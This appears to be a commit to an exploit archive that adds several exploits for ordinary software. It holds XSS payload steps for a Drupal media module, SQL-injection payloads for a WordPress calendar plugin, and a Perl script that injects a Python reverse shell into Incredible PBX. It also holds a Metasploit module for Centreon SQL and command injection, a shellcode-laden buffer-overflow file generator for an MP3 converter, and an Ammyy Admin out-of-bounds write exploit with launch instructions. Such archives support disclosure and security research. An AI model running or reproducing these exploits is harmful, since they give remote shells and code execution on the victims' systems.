Embedded Media Field module for Drupal 6.x versions prior to 6.x-1.26 and 6.x-2.4, and for Drupal 5.x versions prior to 5.x-1.12
Media: Video Flotsam module for Drupal 6.x versions prior to 6.x-1.2
Media: Audio Flotsam module for Drupal 6.x versions prior to 6.x-1.1
1. Install Drupal 6-19, CCK module, and Embedded Media Field module version 6.x-1.25
2. Enable the Content, Embedded Media Field, Embedded Audio Field modules from ?q=/admin/build/modules
3. Alter the default 'Story' content type at ?q=admin/content/node-type/story/fields
4. Add a 'New Field' in the form at the bottom of this page with the label 'audio' the field name 'field_audio' the type 'Embedded Audio' and the form element '3rd Party Aduio' then click the 'Save' button
5. Configure the new video field from ?q=admin/content/node-type/story/fields/field_video
6. Select all content providers for convenience and click 'Save field settings' button at the bottom of the form
7. Create a new piece of story content from ?q=node/add/story entering arbitrary values.
8. Enter "'/><script>alert('xss');</script><embed onshow='alert("foo");'src='http://traffic.libsyn.com/pauldotcom/PaulDotCom-SW-217pt2.mp3" in the 'audio:' text field
9. Click the 'Save' and observe the rendered JavaScript alert whenever the node is displayed
=======================================================================================
1. Install Drupal 6-19, CCK module, and Embedded Media Field module version 6.x-1.25
2. Enable the Content, Embedded Media Field, Embedded Media Thumbnail and Embedded Video Field modules from ?q=/admin/build/modules
3. Alter the default 'Story' content type at ?q=admin/content/node-type/story/fields
4. Add a 'New Field' in the form at the bottom of this page with the label 'video' the field name 'field_video' the type 'Embedded Video' and the form element '3rd Party Video' then click the 'Save' button
5. Configure the new video field from ?q=admin/content/node-type/story/fields/field_video
6. Select YouTube as a content provider for convenience and be sure 'Allow custom thumbnails for this field' is checked and click 'Save field settings' button at the bottom of the form
7. Create a new piece of story content from ?q=node/add/story entering arbitrary values. For the 'Video custom thumbnail' choose an image with
a name like "<image src='no.jpg' onerror='alert("xss")'>.png" and click the 'Upload' button
8. Observe the rendered javascript alert dialogue
9. Click the 'Save' button so that the XSS persists to future node edits

67
platforms/php/webapps/35073.txt Executable file
View file

@ -0,0 +1,67 @@
######################
# Exploit Title : CP Multi View Event Calendar 1.01 SQL Injection Vulnerability
# Exploit Author : Claudio Viviani
# Software Link : https://downloads.wordpress.org/plugin/cp-multi-view-calendar.zip
# Date : 2014-10-23
# Tested on : Windows 7 / Mozilla Firefox
Windows 7 / sqlmap (0.8-1)
Linux / Mozilla Firefox
Linux / sqlmap 1.0-dev-5b2ded0
######################
# Description
CP Multi View Event Calendar 1.01 suffers from SQL injection vulnerability
calid variable is not sanitized.
######################
# PoC
http://localhost/?cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 [Sqli]
# Sqlmap
---
Place: GET
Parameter: calid
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 RLIKE (SELECT (CASE WHEN (9095=9095) THEN 1 ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 AND (SELECT 3807 FROM(SELECT COUNT(*),CONCAT(0x7171736971,(SELECT (CASE WHEN (3807=3807) THEN 1 ELSE 0 END)),0x716b716671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 14 columns
Payload: cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171736971,0x6f7642724e6743615973,0x716b716671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 AND 8168=BENCHMARK(5000000,MD5(0x4a4a6d41))
---
#####################
Discovered By : Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################

186
platforms/php/webapps/35080.pl Executable file
View file

@ -0,0 +1,186 @@
#!/usr/bin/perl
#
# Title: Incredible PBX remote command execution exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Discovered: 1 September 2014
# Coded: 21 October 2014
# Published: 21 October 2014
# MorXploit Research
# http://www.MorXploit.com
# Vendor: PBX in a Flash
# Vendor url: http://pbxinaflash.net/
# Software: Incredible PBX 11
# Version: 2.0.6.5.0
# Product url: http://incrediblepbx.com/
# Vulnerable file: reminders/index.php
#
# About (from their website):
# Incredible PBX is a secure and feature-rich implementation of the terrific Asterisk® PBX. By rethinking the PBX security model from the
# ground up, Incredible PBX was engineered to provide rock-solid security while delivering the most comprehensive collection of Asterisk
# utilities available on the planet including free calling in the U.S. and Canada courtesy of Google Voice.
#
# Description:
# reminders/index.php which ships with Incredible PBX suffers from a command execution vulnerability, allowing an authenticated user to
# inject commands as the asterisk user.
#
# Vulnerable code:
# 484: system $retcode3 = system("sox $tmpwave -r 8000 -c 1 $newgsm");
# 472: $tmpwave = "/tmp/$token.wav";
# 469: $token = md5(uniqid(""));
# 483: $newgsm = "/var/lib/asterisk/sounds/custom/" . $APPTTIME . "." . $APPTDT . "." . $APPTPHONE . ".gsm";
# 381: $APPTTIME = str_replace(array(chr(13), chr(10), "<", ">"), "", $APPTTIME);
# 375: $APPTTIME = $_REQUEST['APPTHR'] . $_REQUEST['APPTMIN'];
# 380: $APPTDT = str_replace(array(chr(13), chr(10), "<", ">"), "", $APPTDT);
# 374: $APPTDT = $_REQUEST['APPTYR'] . $_REQUEST['APPTMO'] . $_REQUEST['APPTDA'];
# 382: $APPTPHONE = str_replace(array(chr(13), chr(10), "<", ">", " ", "(", ")", "-", "."), "", $APPTPHONE);
# 376: $APPTPHONE = $_REQUEST['APPTPHONE'];
#
# As you can see, none of user input sent through $_REQUEST[] parameters is being validated/sanitized before being passed it to system();
#
# Exploit:
# As PoC, the below perl code will try to exploit $_REQUEST['APPTMIN'] to inject a python connect back shell.
#
# Note:
# Access to reminders/index.php requires 'maint' password, in the exploit code we have used the default installation password which is
# 'password'.
#
# Demo:
# ====================================================
# --- Incredible PBX remote command execution exploit
# --- By: Simo Ben youssef <simo_at_morxploit_com>
# --- MorXploit Research www.MorXploit.com
# ====================================================
# [*] MorXploiting http://10.0.0.20/reminders/index.php
# [+] Sent payload! Waiting for connect back shell ...
# sh: no job control in this shell
# sh-4.1$ id; cat /etc/issue
# id; cat /etc/issue
# uid=498(asterisk) gid=497(asterisk) groups=497(asterisk)
# CentOS release 6.5 (Custom) on \m
# Welcome to PBX in a Flash - Green
# Please log in to continue
# ******************************************
# Your IP Address is:
#
# 10.0.0.20
# ******************************************
#
# Download:
# http://www.morxploit.com/morxploits/morxincpbx.pl
#
# Requires LWP::UserAgent
# apt-get install libwww-perl
# yum install libwww-perl
# perl -MCPAN -e 'install Bundle::LWP'
# For SSL support:
# apt-get install liblwp-protocol-https-perl
# yum install perl-Crypt-SSLeay
#
# Author disclaimer:
# The information contained in this entire document is for educational, demonstration and testing purposes only.
# Author cannot be held responsible for any malicious use or damage. Use at your own risk.
use LWP::UserAgent;
use MIME::Base64;
use IO::Socket;
use strict;
sub banner {
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print "====================================================\n";
print "--- Incredible PBX remote command execution exploit\n";
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
print "--- MorXploit Research www.MorXploit.com\n";
print "====================================================\n";
}
if (!defined ($ARGV[0] && $ARGV[1] && $ARGV[2])) {
banner();
print "perl $0 <target> <connectbackIP> <connectbackport>\n";
print "perl $0 http://10.0.0.16 10.0.0.2 31337\n";
exit;
}
my $host = $ARGV[0];
my $vuln = "reminders/index.php";
my $cbhost = $ARGV[1];
my $cbport = $ARGV[2];
my $defuser = "maint"; # Default maint user
my $defpass = "password"; # Default maint pass
my $string = "$defuser:$defpass";
my $host2 = "http://localhost:81";
my $encoded = encode_base64($string);
$| = 1;
$SIG{CHLD} = 'IGNORE';
my $l_sock = IO::Socket::INET->new(
Proto => "tcp",
LocalPort => "$cbport",
Listen => 1,
LocalAddr => "0.0.0.0",
Reuse => 1,
) or die "[-] Could not listen on $cbport: $!\n";
sub randomagent {
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
);
my $random = $array[rand @array];
return($random);
}
my $useragent = randomagent();
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua->timeout(10);
$ua->agent($useragent);
my $status = $ua->get("$host/$vuln", Authorization => "Basic $encoded");
unless ($status->is_success) {
banner();
print "[-] Error: " . $status->status_line . "\n";
exit;
}
banner();
print "[*] MorXploiting $host/$vuln\n";
my $payload = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$cbhost\",$cbport));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'";
my $get = "APPTDA=morx&APPTPHONE=morx&APPTMO=morx&APPTMIN=;$payload;&APPTHR=morx";
my $exploit = $ua->get("$host/$vuln?$get", Authorization => "Basic $encoded");
print "[+] Sent payload! Waiting for connect back root shell ...\n";
my $a_sock = $l_sock->accept();
$l_sock->shutdown(SHUT_RDWR);
copy_data_bidi($a_sock);
sub copy_data_bidi {
my ($socket) = @_;
my $child_pid = fork();
if (! $child_pid) {
close(STDIN);
copy_data_mono($socket, *STDOUT);
$socket->shutdown(SHUT_RD);
exit();
} else {
close(STDOUT);
copy_data_mono(*STDIN, $socket);
$socket->shutdown(SHUT_WR);
kill("TERM", $child_pid);
}
}
sub copy_data_mono {
my ($src, $dst) = @_;
my $buf;
while (my $read_len = sysread($src, $buf, 4096)) {
my $write_len = $read_len;
while ($write_len) {
my $written_len = syswrite($dst, $buf);
return unless $written_len;
$write_len -= $written_len;
}
}
}

139
platforms/unix/remote/35078.rb Executable file
View file

@ -0,0 +1,139 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Centreon SQL and Command Injection',
'Description' => %q{
This module exploits several vulnerabilities on Centreon 2.5.1 and prior and Centreon
Enterprise Server 2.2 and prior. Due to a combination of SQL injection and command
injection in the displayServiceStatus.php component, it is possible to execute arbitrary
commands as long as there is a valid session registered in the centreon.session table.
In order to have a valid session, all it takes is a successful login from anybody.
The exploit itself does not require any authentication.
This module has been tested successfully on Centreon Enterprise Server 2.2.
},
'License' => MSF_LICENSE,
'Author' =>
[
'MaZ', # Vulnerability Discovery and Analysis
'juan vazquez' # Metasploit Module
],
'References' =>
[
['CVE', '2014-3828'],
['CVE', '2014-3829'],
['US-CERT-VU', '298796'],
['URL', 'http://seclists.org/fulldisclosure/2014/Oct/78']
],
'Arch' => ARCH_CMD,
'Platform' => 'unix',
'Payload' =>
{
'Space' => 1500, # having into account 8192 as max URI length
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic python gawk bash-tcp netcat ruby openssl'
}
},
'Targets' =>
[
['Centreon Enterprise Server 2.2', {}]
],
'Privileged' => false,
'DisclosureDate' => 'Oct 15 2014',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI of the Centreon Application', '/centreon'])
], self.class)
end
def check
random_id = rand_text_numeric(5 + rand(8))
res = send_session_id(random_id)
unless res && res.code == 200 && res.headers['Content-Type'] && res.headers['Content-Type'] == 'image/gif'
return Exploit::CheckCode::Safe
end
injection = "#{random_id}' or 'a'='a"
res = send_session_id(injection)
if res && res.code == 200
if res.body && res.body.to_s =~ /sh: graph: command not found/
return Exploit::CheckCode::Vulnerable
elsif res.headers['Content-Type'] && res.headers['Content-Type'] == 'image/gif'
return Exploit::CheckCode::Detected
end
end
Exploit::CheckCode::Safe
end
def exploit
if check == Exploit::CheckCode::Safe
fail_with(Failure::NotVulnerable, "#{peer} - The SQLi cannot be exploited")
elsif check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - The SQLi cannot be exploited. Possibly because there's nothing in the centreon.session table. Perhaps try again later?")
end
print_status("#{peer} - Exploiting...")
random_id = rand_text_numeric(5 + rand(8))
random_char = rand_text_alphanumeric(1)
session_injection = "#{random_id}' or '#{random_char}'='#{random_char}"
template_injection = "' UNION ALL SELECT 1,2,3,4,5,CHAR(59,#{mysql_payload}59),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- /**"
res = send_template_id(session_injection, template_injection)
if res && res.body && res.body.to_s =~ /sh: --imgformat: command not found/
vprint_status("Output: #{res.body}")
end
end
def send_session_id(session_id)
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.to_s, 'include', 'views', 'graphs', 'graphStatus', 'displayServiceStatus.php'),
'vars_get' =>
{
'session_id' => session_id
}
)
res
end
def send_template_id(session_id, template_id)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.to_s, 'include', 'views', 'graphs', 'graphStatus', 'displayServiceStatus.php'),
'vars_get' =>
{
'session_id' => session_id,
'template_id' => template_id
}
}, 3)
res
end
def mysql_payload
p = ''
payload.encoded.each_byte { |c| p << "#{c},"}
p
end
end

View file

@ -0,0 +1,38 @@
#!/usr/bin/env python
# Free WMA MP3 Converter 1.8 Buffer Overflow
# Version:1.8 Build 20140226
# Author:metacom
# Date:10.23.2014
# Download:http://www.eusing.com/free_wma_converter/mp3_wma_converter.htm
# Tested on:Win7-En 32bit - Win8.1-DE 64bit
import struct
def little_endian(address):
return struct.pack("<L",address)
poc="\x41" * 4112
eip=little_endian(0x0045CD1A)#0045CD1A FFE4 JMP ESP
nops="\x90" * 80
shellcode=("\xdb\xd7\xd9\x74\x24\xf4\xb8\x79\xc4\x64\xb7\x33\xc9\xb1\x38"
"\x5d\x83\xc5\x04\x31\x45\x13\x03\x3c\xd7\x86\x42\x42\x3f\xcf"
"\xad\xba\xc0\xb0\x24\x5f\xf1\xe2\x53\x14\xa0\x32\x17\x78\x49"
"\xb8\x75\x68\xda\xcc\x51\x9f\x6b\x7a\x84\xae\x6c\x4a\x08\x7c"
"\xae\xcc\xf4\x7e\xe3\x2e\xc4\xb1\xf6\x2f\x01\xaf\xf9\x62\xda"
"\xa4\xa8\x92\x6f\xf8\x70\x92\xbf\x77\xc8\xec\xba\x47\xbd\x46"
"\xc4\x97\x6e\xdc\x8e\x0f\x04\xba\x2e\x2e\xc9\xd8\x13\x79\x66"
"\x2a\xe7\x78\xae\x62\x08\x4b\x8e\x29\x37\x64\x03\x33\x7f\x42"
"\xfc\x46\x8b\xb1\x81\x50\x48\xc8\x5d\xd4\x4d\x6a\x15\x4e\xb6"
"\x8b\xfa\x09\x3d\x87\xb7\x5e\x19\x8b\x46\xb2\x11\xb7\xc3\x35"
"\xf6\x3e\x97\x11\xd2\x1b\x43\x3b\x43\xc1\x22\x44\x93\xad\x9b"
"\xe0\xdf\x5f\xcf\x93\xbd\x35\x0e\x11\xb8\x70\x10\x29\xc3\xd2"
"\x79\x18\x48\xbd\xfe\xa5\x9b\xfa\xf1\xef\x86\xaa\x99\xa9\x52"
"\xef\xc7\x49\x89\x33\xfe\xc9\x38\xcb\x05\xd1\x48\xce\x42\x55"
"\xa0\xa2\xdb\x30\xc6\x11\xdb\x10\xa5\xaf\x7f\xcc\x43\xa1\x1b"
"\x9d\xe4\x4e\xb8\x32\x72\xc3\x34\xd0\xe9\x10\x87\x46\x91\x37"
"\x8b\x15\x7b\xd2\x2b\xbf\x83")
exploit = poc + eip + nops + shellcode
try:
rst= open("bof_WMA MP3 Converter.wav",'w')
rst.write(exploit)
rst.close()
except:
print "Error"

View file

@ -0,0 +1,293 @@
Mirror: http://www.exploit-db.com/sploits/aa0day.zip
The Revenge of the Scammers
This exploit is an 0day in Ammyy Admin (http://www.ammyy.com/en/) a remote desktop type software that is well known for being the software that many fake tech support phone scammers used on their victims. It claims to be used by tens of millions of people. The 0-day works from the "controlled" end; when someone tries to connect to you, asking to control your computer, you send back the exploit and take over the controller. It has been written for and tested against the latest version of Ammyy Admin. (now 3.5)
This package includes two main parts: a fully commented Metasploit module, and the “aaexploit.exe” launcher. The MSF module generates a file “exploit.dat” that you will copy along with aaexploit.exe to a computer or VM to launch the exploit from. The exploit is actually launched from a DLL injected into a copy of AA, which hooks AA's data send functions, replacing them with the exploit data. This is done to avoid re-implementing AA's complex outer encryption wrapper, and allow for multiple connection types (although only one has been tested). Aaexploit.exe automates the extraction of the AA executable and dll and injection of the DLL.
This exploit has tested against many configurations, (Windows Vista and 7 32 and 64 bit) but so far it has been tested only on isolated networks. One of the ways AA can connect is via a relay in the cloud run by Ammyy. Via reverse-engineering and debugging, it is clear the same functions are reached through both methods (relay or direct), but for OPSEC reasons, I have not sent the exploit through the relays in the cloud. You can also avoid that by running your exploit from a VM directly connected to the internet, and blocking the rl.ammyy.com relay:
0. Open a windows VM you'll launch the exploit from.
1. Add the line "127.0.0.1 rl.ammyy.com" to C:\Windows\system32\drivers\etc\hosts
2. Set your VM to "bridged" and disable the firewall.
3. Forward TCP port 5931 from your router to your VM IP address.
4. When the bad guys ask for your Ammyy ID, tell them your EXTERNAL IP address. https://www.google.com/search?q=what+is+my+ip
This only allows direct connection rather than going through the Ammyy relay servers. Connections are encrypted, so you may not be concerned, but the choice is up to you.
If want to generate your own payload, drop the .rb file in your modules/exploits/windows/fileformat/ directory, start up metasploit, "use exploit/windows/fileformat/ammyy_admin_oob" and use the 3.5 direct target. Remember you have to start up a handler separately. The Always-On DEP-bypassing targets rely on loading a DLL from a UNC path, which can take a long time, depends on more things, and requires you to set up webdav and/or an SMB server somewhere manually. Also, nobody but the most paranoid security guys set the obscure Always-On DEP setting, so you really don't have to worry about it. The 3.4 targets are still in there because they were the latest until a few weeks ago, but your best bet is to stick with the latest 3.5.
Testing Instructions
1. Download Ammyy from the Ammyy website.
2. Set up two Windows VM's in an isolated network.
3. Use the Metasploit module to generate your exploit.dat file.
4. Copy the exploit.dat file and aaexploit.exe to the first VM (good guy VM) and run aaexploit.exe. After a few seconds, you will get a popup saying Ammyy isn't connected to the internet. Click to ignore it. Wait for 15 seconds to complete loading the exploit.
5. Start the Ammyy executable on the second VM (bad guy VM). After a few seconds, you will get a popup saying Ammyy isn't connected to the internet. Click to ignore it.
6. From the bad guy VM, type in the IP of the good guy VM in the “Client ID/IP” field and click Connect.
7. You will get a popup on the good guy VM asking if you want to allow the connection. Hit “allow” to send the exploit.
8. The bad guy VM should display a blank “Loading” window that will sit there as long as your shellcode is running. In this exploit, I deliberately did NOT return execution flow to the original thread, since I assumed you would not want to provide the bad guy with control over your VM.
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rexml/document'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Ammyy Admin Array Index Out-Of-Bounds',
'Description' => %q{
This exploit gains code execution on the controller side of Ammyy Admin from the controlled
side. To do this, it exploits an array index out-of-bounds write. The exploit uses the
relative OOB write to overwrite a return address on the thread stack, which is generally
mapped directly below the Ammyy image data, and retrying on the next thread stack in case
that was not the correct thread.
There are two targets, one for immediate, direct shellcode execution taking advantage of
the fact that Ammyy does not opt-in to DEP, and the second, using a ROP-only exploit to
call LoadLibraryW with a remote UNC path.
Since Ammyy Admin uses a crypto library that would be very time-consuming to reproduce and
multiple methods of setting up a connection (relay, direct, etc.) this exploit was written
to simply hook Ammyy Admin from an injected DLL, using its own code to handle the crypto and
connections, substituting the exploit for any data sent to the server. This module will
generate a file (exploit.dat) you must copy, along with aaexploit.exe, to a Windows VM. Run
aaexploit.exe, and wait for a connection. When you hit "accept" on the connection, the
exploit will be sent.
This module has been tested successfully against Ammyy Admin 3.4 on Windows Vista 32-bit
and Windows 7 32 and 64-bit for direct (IP) connections only.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Matt "scriptjunkie" Weeks <scriptjunkie[at]scriptjunkie.us>'
],
'References' =>
[
[ 'CVE', '2014-XXXX' ],
[ 'OSVDB', 'XXXX' ],
],
'Payload' =>
{
'Space' => 800,
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
[ 'Ammyy Admin 3.4 Direct',
{
'Type' => 'direct',
'Version' => '3.4'
}
],
[ 'Ammyy Admin 3.4 Always-On DEP',
{
'Type' => 'rop',
'Version' => '3.4'
}
],
[ 'Ammyy Admin 3.5 Direct',
{
'Type' => 'direct',
'Version' => '3.5'
}
],
[ 'Ammyy Admin 3.5 Always-On DEP',
{
'Type' => 'rop',
'Version' => '3.5'
}
]
],
'Privileged' => true,
'DisclosureDate' => '',
'DefaultTarget' => 0))
register_options(
[
OptString.new('DLL_PATH', [ false, 'The DLL path to load for the DEP Always-On target.',
'\\\\1.2.3.4\\file.dll']),
OptString.new('FILENAME', [ true, 'The file name.', 'exploit.dat']),
], self.class)
end
# Takes a string of binary data, and generates a stroke set in the Ammyy protocol which will
# write that data to the specified col/row point on the remote side, skipping a given pixel if
# specified to avoid overwriting a particular local variable at the wrong time
def strokeSet(col, row, data, skip)
#minus one because the number of strokes is the number of pixels - 1
numpixels = (data.length + 3) / 4
numpixels -= 1 if skip != -1 # subtract again if you have a skip
#03 XoffsetWord YoffsetWord DrawWidthWord DrawHeightWord
output = "\x03" + [col, row, numpixels, 1].pack('vvvv')
output << "XXXX" # end of packet signal to injector
offset = -1
#zero pad to 4 byte boundary; any extra is discarded in unpack("V*")
(data + "\x00\x00\x00").unpack('V*').each do |pixel|
offset += 1
next if skip == offset # don't write this pixel if we're avoiding overwriting a var
# Get pixel values from this 4-byte chunk
r, g, b, a = [pixel].pack("V").unpack("C*")
# sanity check pixel value
print_error("Shellcode at pixel #{offset} invalid; has trailing 0") if a != 0
# We send pixels in 16 x 1 sections; each of which has its own header (0x1A)
if offset % 0x10 == 0
# Chunk header; includes flags (0x1A), background color we use to set 1st pixel values,
# and number of strokes (pixels) remaining to send in this chunk
numstrokes = [0xF, numpixels - offset - 1].min
output << [0x1A, r, g, b, numstrokes].pack("C*")
else
# This is a stroke. A stroke can be multiple pixels wide or high, but we're just using
# them to write a single pixel each. Data format looks like this:
# R G B [low nibble Y offset, high nibble X offset]
# [low nibble stroke height; high nibble stroke width]
# since we're only using 1x1 strokes, we only set the X offset part of this
output << [r, g, b, (offset % 0x10) << 4, 0].pack("C*")
end
end
output << "XXXX"
output
end
def exploit
# Injected dll divides packets to send by "XXXX"
# First we specify header data and global flags for the connection.
sploit = "XXXX=XXXX"
sploit << "\x7E\xCC\xF5\xED\xB7\x16\x92\xE2\x96\xBD\xF3\xFF\xC0\xFF\x2D\x97\x69\xF2\xCA\x99"
sploit << "XXXX"
sploit << "\x00\x7F\x00\x00\x00"
sploit << "XXXX"
# send bogus system info
sploit << "\x3A\x00Windows\x006.0.6001 SP1.0\x00U_R_PWNED\x0AJan 01 2014 at 01:23:45\x00\x05"
sploit << "XXXX"
sploit << "\x15"
sploit << "XXXX"
# screen dimensions and stuff
sploit << "\x70\x03\x03\x65\x18\x00\xff\x00\xff\x00\xff\x00\x10\x08\x00\x20\x00\xff\x00\xff\x00"
sploit << "\xff\x00\x10\x08\x00\x20\x03\x58\x02"
sploit << "XXXX"
if target['Version'] == '3.4'
offsets = {
'push_esp_ret' => 0x004424a2,
'pop_ebp_ret' => 0x004488bf,
'loadlibW' => 0x0044C7B3,
'pop_edi_ret' => 0x0045aba9,
'pop_esi_ret' => 0x00460029,
'pushad_ret' => 0x0045ed48,
'ret' => 0x00430315
}
else
offsets = {
'push_esp_ret' => 0x004786cf,
'pop_ebp_ret' => 0x00418086,
'loadlibW' => 0x0044F079,
'pop_edi_ret' => 0x00471639,
'pop_esi_ret' => 0x0046003e,
'pushad_ret' => 0x004615e8,
'ret' => 0x004012C0
}
end
if target['Type'] == 'direct'
# shellcode must be in unicode format
first_payload = payload.encoded
encoder = framework.encoders.create("x86/unicode_mixed")
encoder.datastore.import_options_from_hash( {'BufferRegister'=> 'ESP' })
unicode_payload = encoder.encode(first_payload, nil, nil, platform)
scode = unicode_payload.unpack("C*").pack("v*")
# actually not, but every 4th byte must be a 0 since we can only write the R G B parts of
# the pixel, and the pixels are stored as R G B A, which ends up being R G B 0, but we
# don't have a generic "every 4th byte must be null" encoder, so we just use the Unicode
# one, which works just fine.
# First stroke set will write the shellcode at the beginning of the screen buffer
sploit << strokeSet(0, 599, scode, -1)
# Second write will be an OOB write that will overwrite the return address
# Then calculate address of shellcode and jump to the shellcode
# This will work most of the time
stack = [offsets['push_esp_ret'], # PUSH ESP # RETN in AA_v3.exe
0x00000000].pack("V*") # not used since ret 4; must be skipped due to local var
stack << "\xB8\x3C\x01\x00\x00" + # mov eax, 0x13C
"\xEB\x01" + # jmp next
"\x00" + # has to be null
"\x01\xC4" + # next: add esp, eax
"\xEB\x00" + # jmp over mandatory null
"\xFF\xE4" # jmp esp
# Return address is at 0325FEBC, when pixel data starts at 03360000. That's a 0x144 or 324
# byte OOB overwrite from start of image, which is 81 pixels. So, with an 800x600 screen,
# we use a stroke set with X offset 719 and Y offset 600 (rows go down in address)
sploit << strokeSet(719, 600, stack, 1)
# Third write will be second trigger, and may work if that fails
# it's pretty much the same thing except add another megabyte (default stack size) to esp
stack = [offsets['push_esp_ret'], # PUSH ESP # RETN in AA_v3.exe
0x00000000].pack("V*") # not used since ret 4; must be skipped due to local var
stack << "\x81\xC4\x3C\x00\x01\x00" # add esp,0x1003c
"\xEB\x00" # jmp over mandatory null
"\xB8\x00\x01\x00\x00" # mov eax,0x100
"\xEB\x01" + # jmp next
"\x00" + # has to be null
"\x01\xC4" + # next: add esp, eax
"\xEB\x00" + # jmp over mandatory null
"\xFF\xE4" # jmp esp
# executing stack is 0x100000 below since default stack size is 1MB (0x100000 bytes); e.g.
# at 0347FEBC when image starts at 03580000. That's 0x40051 (or 262225) pixels back, which
# is 327 rows and then 625 pixels. So our X offset is 175 (AF) and Y offset is 927
sploit << strokeSet(175, 927, stack, 1)
elsif target['Type'] == 'rop'
# ROP target is all-in-one write that will overwrite the return address on the stack
# and end up calling LoadLibraryW with a UNC path
stack = [offsets['pop_ebp_ret'], # POP EBP # RETN [AA_v3.exe]
0x00000000, # not used since ret 4; must be skipped due to local var
offsets['loadlibW'], # address of call LoadLibraryW
offsets['pop_edi_ret'], # POP EDI # RETN [AA_v3.exe]
offsets['ret'], # RETN
offsets['pop_esi_ret'], # POP ESI # RETN
offsets['ret'], # RETN
offsets['pushad_ret'], # PUSHAD # RETN jumps to edi, with esi, ebp, orig esp... above
].pack("V*")
stack << datastore['DLL_PATH'].unpack("C*").pack("v*")
# same offset logic as above
sploit << strokeSet(719, 600, stack, 1)
# second try, same logic as above
sploit << strokeSet(175, 927, stack, 1)
end
print_status("Creating '#{datastore['FILENAME']}' file ...")
print_status("Now copy that, along with aaexploit.exe, to a Windows VM.")
print_status("Then run aaexploit.exe, and wait for a connection.")
print_status("Hit accept on a connection request to send the exploit.")
file_create(sploit)
end
end